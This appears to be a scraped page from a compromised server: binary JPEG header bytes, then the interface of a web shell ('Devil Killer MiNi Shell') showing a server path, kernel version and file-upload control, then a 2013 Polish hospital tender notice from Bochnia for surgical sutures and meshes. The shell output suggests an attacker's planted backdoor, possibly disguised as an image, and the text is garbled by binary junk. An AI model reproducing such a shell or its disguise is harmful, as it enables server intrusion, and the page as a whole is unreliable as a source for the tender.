JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131230/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131230/282731-N-2013.html

<p class="kh_header"><b>Bochnia: Dostawa nici chirurgicznych oraz siatek dla Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Bochni  Szpital Powiatowy im. bł. Marty Wieckiej</b><br>
<b>Numer ogłoszenia: 282731 - 2013; data zamieszczenia: 30.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej w Bochni "Szpital Powiatowy" im. bł. Marty Wieckiej , ul. Krakowska 31, 32-700 Bochnia, woj. małopolskie, tel. 14 6153201, 6153233, 50979196, faks 14 6153202.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital-bochnia.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa nici chirurgicznych oraz siatek dla Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Bochni  Szpital Powiatowy im. bł. Marty Wieckiej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest Dostawa nici chirurgicznych oraz siatek dla Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Bochni Szpital Powiatowy im. bł. Marty Wieckiej opisanych w sposób szczegółowy w załączniku 
2.	Przedmiot zamówienia został podzielony według następujących pakietów
Pakiet nr 1 - Nici wchłanialne 
Pakiet nr 2  - Nici niewchłanialne
Pakiet nr 3 - Szew stosowany do leczenia urazów rzepki
Pakiet nr 4 - Wosk kostny
Pakiet nr 5 - Nić nylonowa
Pakiet nr 6 - Siatki, Taśmy do leczenia Wysiłkowego Nietrzymania Moczu u kobiet
Pakiet nr 7 - Siatki przepuklinowe
Pakiet nr 8 - Sterylny jednorazowy system mini do leczenia wysiłkowego nietrzymania moczu u kobiet.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4, 33.14.11.20-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający uzna warunek za spełniony, jeżeli wykonawca przedstawi oświadczenie, o którym mowa w punkcie III.4.1). Ocena spełnienia tego warunku będzie dokonana na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca składający ofertę na jeden pakiet wykaże posiadanie wiedzy i doświadczenia rozumianej jako zasób umiejętności, praktykę i wprawę, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wyrażające się w wykonaniu co najmniej dwóch dostaw, każda odpowiadająca zakresem dostaw i wartością brutto według zestawienia poniżej

Pakiet nr 1 - Nici wchłanialne 	73 000,00 zł 
Pakiet nr 2  - Nici niewchłanialne	25 000,00 zł 
Pakiet nr 3 - Szew stosowany do leczenia urazów rzepki	300,00 zł 
Pakiet nr 4 - Wosk kostny	170,00 zł 
Pakiet nr 5 - Nić nylonowa	700,00 zł 
Pakiet nr 6 - Siatki, Taśmy do leczenia Wysiłkowego Nietrzymania Moczu u kobiet	19 000,00 zł 
Pakiet nr 7 - Siatki przepuklinowe	2 000,00 zł 
Pakiet nr 8 - Sterylny jednorazowy system mini do leczenia wysiłkowego nietrzymania moczu u kobiet	 3 000,00 zł 
1b.	Wykonawca składający ofertę na więcej niż jeden pakiet musi wykazać posiadanie wiedzy i doświadczenia rozumianej jako zasób umiejętności, praktykę i wprawę, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wyrażające się w wykonaniu co najmniej dwóch dostaw, każda odpowiadająca zakresem dostaw i wartością brutto (minimum) określoną dla najdroższego pakietu - określoną w wymaganiach Zamawiającego według zestawienia powyżej

Na przykład: 
1) jeżeli Wykonawca złoży ofertę na pakiet nr 1, 2, 6  - powinien wykazać, że w okresie ostatnich trzech lat przed upływem terminu składania ofert do postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał co najmniej dwie dostawy odpowiadające zakresem dostaw i wartością brutto (minimum) 73 000,00 zł (pakiet nr 1);
Zamawiający oceniać będzie spełnienie tego warunku, w oparciu o przedstawiony przez Wykonawcę wykaz, o którym mowa w punkcie III.4.1) ppkt1). Ocena spełnienia tego warunku będzie dokonana na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający uzna warunek za spełniony, jeżeli wykonawca przedstawi oświadczenie, o którym mowa w punkcie III.4.1). Ocena spełnienia tego warunku będzie dokonana na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający uzna warunek za spełniony, jeżeli wykonawca przedstawi oświadczenie, o którym mowa w punkcie III.4.1). Ocena spełnienia tego warunku będzie dokonana na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający uzna warunek za spełniony, jeżeli wykonawca przedstawi oświadczenie, o którym mowa w punkcie III.4.1). Ocena spełnienia tego warunku będzie dokonana na zasadzie spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Zamawiający wymaga złożenia wykazu (według załącznika nr 5 siwz), wraz z dowodami potwierdzającymi dostawy o których mowa w pkt. III.3.2) siwz, że zostały one wykonane lub są wykonywane należycie. 
Dowodami, o których mowa powyżej jest poświadczenie z tym, że w odniesieniu do nadal wykonywanych dostaw okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo ofert lub oświadczenie wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia;
W przypadku gdy zamawiający jest podmiotem, na rzecz którego dostawy wskazane w wykazie, o którym mowa powyżej zostały wcześniej wykonane, wykonawca nie ma obowiązku przedkładania dowodów, o których mowa w pkt III.4. 1) pkt 1).
W miejsce poświadczeń, o których mowa powyżej Wykonawca może przedłożyć dokumenty potwierdzające należyte wykonanie usług określone w § 1 ust. 1 pkt 3 rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 226, poz. 1817) tj. dokumenty dotychczas wykorzystywane przez wykonawców;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1).	Oświadczenie, że wszystkie pozycje, stanowiące przedmiot zamówienia, które tego wymagają, zawarte w FORMULARZU ASORTYMENTOWO-CENOWYM, stanowiącym ZAŁĄCZNIK do oferty, spełniają wymagania przewidziane w  ustawie o wyrobach medycznych z dnia 20 maja 2010 r. (Dz. U. z 2010 nr 107 poz. 679), a także w obowiązujących przepisach Unii Europejskiej ( oświadczenie zawarte w załączniku nr 1),
2).	Katalogi, materiały informacyjne, które będą potwierdzać spełnianie przez asortyment proponowany przez Wykonawcę parametry wymagane przez Zamawiającego - każda strona materiału informacyjnego musi zostać podpisana którego pakietu i pozycji dotyczy
Ocena spełnienia warunków w zakresie potwierdzenia, że oferowane dostawy odpowiadają określonym wymaganiom dokonana zostanie wg formuły: spełnia/ nie spełnia.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	W przypadku podpisywania oferty lub poświadczania za zgodność z oryginałem kopii dokumentów przez osob(ę)y nie wymienion(ą)e w dokumencie rejestracyjnym (ewidencyjnym) Wykonawcy, należy do oferty dołączyć stosowne pełnomocnictwa. 
W przypadku udzielenia pełnomocnictwa, wymagana jest forma, rodzaj i zakres pełnomocnictwa właściwy do poszczególnych czynności. Kserokopia pełnomocnictwa musi być poświadczona przez notariusza.
2.	W przypadku gdy, Wykonawca powołuje się na wiedzę i doświadczenie, potencjał techniczny, osoby zdolne do wykonania zamówienia lub zdolności finansowe innych podmiotów - pisemne zobowiązanie tych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia wraz z określeniem zakresu udzielanych zasobów. 
3.	Pełnomocnictwo do reprezentowania konsorcjum w postępowaniu o udzielenie zamówienia publicznego lub do reprezentowania w postępowaniu o udzielenie zamówienia publicznego 
i zawarcia umowy - w przypadku wykonawców wspólnie ubiegający się o udzielenie 
Dokumenty mogą być przedstawione w formie oryginału lub kopii poświadczonych (każda strona dokumentu) za zgodność z oryginałem przez  wykonawcą.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Wszelkie zmiany niniejszej umowy z zastrzeżeniem art. 144 ust. 1 ustawy Prawo zamówień publicznych mogą być dokonywane za zgodą obu Stron, wyrażoną na piśmie, pod rygorem nieważności. 
2.	Strony dopuszczają zmiany w umowie w następującym zakresie:
a)	numeru katalogowego poszczególnych Towarów,
b)	nazwy Towaru przy zachowaniu jego parametrów,
c)	sposobu konfekcjonowania,
d)	danych identyfikujących strony umowy, takich jak np. firma, adresu siedziby lub inne zapisy dotyczące wskazania stron. 
3.	W przypadku zmiany wielkości opakowania wprowadzonej przez producenta, strony dopuszczają zmianę cen jednostkowych poszczególnych Towarów objętych umową z zachowaniem zasady proporcjonalności w stosunku do ceny objętej umową
4.	Wykonawca zobowiązuje się do nie zwiększania cen jednostkowych netto określonych w ofercie przetargowej przez okres trwania umowy, przy czym w czasie trwania umowy ceny mogą ulec zmianie w przypadku wzrostu/spadku obowiązujących stawek podatków i opłat granicznych,  
5.	Zaistnienie okoliczności wymienionych w ust  5  nie wymaga sporządzenia aneksu.
6.	Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w razie wystąpienia okoliczności, których nie można było przewidzieć w chwili zawarcie umowy tj.:
a)	zakończenia produkcji Towaru
b)	wygaśnięcia rejestracji Towaru
c)	zmiany ilości poszczególnych pozycji umowy określonych w Załączniku nr 1, pod warunkiem nie przekroczenia ogólnej wartości umowy określonej w § 4 pkt.1.
d)	zmniejszenia wartości umowy stosownie do potrzeb Zamawiającego
7.	Na potwierdzenie okoliczności, o których mowa w ust. 6 a), b) Wykonawca przedstawi pisemne zawiadomienie producenta lub stosownego organu.
8.	Wykonawca w sytuacji określonej w ust.6 a), b), w porozumieniu z Zamawiającym zaproponuje produkt równoważny z zachowaniem formy pisemnej pod rygorem nieważności. 
9.	Cena jednostkowa proponowanego produktu nie może być wyższa niż produktu oferowanego w załączniku nr 1 do niniejszej umowy
10.	Zaistnienie okoliczności wymienionych w ust  6 lit. c), d) nie wymaga sporządzenia aneksu</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital-bochnia.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej w Bochni Szpital Powiatowy im. bł. Marty Wieckiej, ul.  Krakowska 31, 32-700 Bochnia, Dział Zaopatrzenia i Zamówień Publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.01.2014 godzina 13:00, miejsce: Ofertę należy złożyć w siedzibie Zamawiającego w Bochni przy ul. Krakowskiej 31 na Dzienniku podawczym - sekretariat pok. nr 3, Pawilon A.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet nr 1 - Nici wchłanialne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 1 - Nici wchłanialne 	
Wchłanialna plecionka. Okres całkowitego wchłonięcia masy szwu maksymalnie 56 - 90 dni, OKRES PODTRZYMYWANIA TKANKOWEGO 28-35 DNI	
Lp.	Grubość	Długość nitki	Długość igły	Cechy charakterystyczne	Jednostka miary	Ilość jednostek miary	
1.	2.	3.	4.	5.	6.	7.	
1.	2/0	3 x 45cm		Podwiązka	Saszetka	72	
2.	3/0	3 x 45cm		Podwiązka	Saszetka	360	
3.	1	140cm-150cm		Podwiązka	Saszetka	144	
4.	4/0	70cm-75cm	20-22mm	1/2 koła okrągła	Saszetka	24	
5.	3/0	70cm-75cm	20-22mm	1/2 koła okrągła	Saszetka	444	
6.	2/0	70cm-75cm	26mm	1/2 koła okrągła	Saszetka	204	
7.	2/0	70cm-75cm	30-31mm	1/2 koła okrągła	Saszetka	408	
8.	2/0	90cm	40s mm	1/2 koła okrągła, pogrubiona, wzmocniona, utwardzona	Saszetka	216	
9.	2/0	90cm	48mm	1/2 koła okrągła	Saszetka	360	
10.	2/0	70-75cm	60-65mm	1/2 koła okrągła	Saszetka	72	
11.	0	70cm-75cm	30-31mm	1/2 koła okrągła	Saszetka	348	
12.	0	70cm-75cm	26mm	1/2 koła okrągła	Saszetka	120	
13.	1	70-90cm	60-65mm	1/2 koła okrągła	Saszetka	540	
14.	1	70cm-75cm	40 s mm	1/2 koła okrągła, pogrubiona, wzmocniona, utwardzona	Saszetka	324	
15.	1 - pętla	150cm	60-65mm	1/2 koła okrągła	Saszetka	336	
16.	1	90cm	48mm	1/2 koła okrągła	Saszetka	288	
17.	1	70cm-75cm	37 s mm	1/2 koła okrągła, pogrubiona, wzmocniona, utwardzona	Saszetka	1452	
18.	2	70cm-75cm	60-65mm	1/2 koła okrągła	Saszetka	72	
19.	2	70cm-75cm	40 s mm	1/2 koła okrągła, pogrubiona, wzmocniona, utwardzona	Saszetka	36	
20.	2	70cm-75cm	37 s mm	1/2 koła okrągła, pogrubiona, wzmocniona, utwardzona	Saszetka	2148	
Szew syntetyczny pleciony powlekany. Okres podtrzymywania tkanki ok. 5 dni dni, całkowite wchłonięcie masy szwu ~ 42 dni	
Lp.	Grubość	Długość nitki	Długość igły	Cechy charakterystyczne	Jednostka miary	Ilość jednostek miary	 
 
 
 
 
 
1.	2.	3.	4.	5.	6.	7.	
1.	4/0	70cm-75cm	22mm	1/2 koła okrągła	Saszetka	72	
2.	3/0	70cm-75cm	26mm	1/2 koła okrągła	Saszetka	72	
3.	2/0	70cm-75cm	30mm	1/2 koła okrągła	Saszetka	396	
4.	2/0	70cm-75cm	26mm	1/2 koła okrągła	Saszetka	72	
5.	2/0	70cm-75cm	24mm	3/8 koła tnąca	Saszetka	144	
6.	1	90cm	40 s mm	1/2 koła okrągła, pogrubiona, wzmocniona, utwardzona	Saszetka	144	
7.	1	90cm	37 s mm	1/2 koła okrągła, pogrubiona, wzmocniona, utwardzona	Saszetka	324	
8.	1	90cm	48mm	1/2 koła okrągła	Saszetka	324	
Szew syntetyczny wchłanialny jednowłókninowy, niepowlekany okres podtrzymywanie tkanki ok. 4 tygodni, całkowitego wchłaniania 60-120 dni	
Lp.	Grubość	Długość nitki	Długość igły	Cechy charakterystyczne	Jednostka miary	Ilość jednostek miary
1.	2.	3.	4.	5.	6.	7.
1.	1	90cm	48mm	1/2 koła okrągła	Saszetka	756
Nić jednowłóknowa, niepowlekana, fioletowa, wchłanianie 50 % po 28-35 dniach, O % po 70 dniach, całkowite wchłanianie masy szwu 160-210 dni.Wykonana z poli-p-dioksanonu .	
Lp.	Grubość	Długość nitki	Długość igły	Cechy charakterystyczne	Jednostka miary	Ilość jednostek miary	
1.	2.	3.	4.	5.	6.	7.	
1.	4/0	70 cm	 13mm	1/ 2 koła okrągła 	Saszetka	36	
2.	2/0	70cm	  26 s mm	1/2 koła okrągła, pogrubiona, wzmocniona, utwardzona	Saszetka	36	
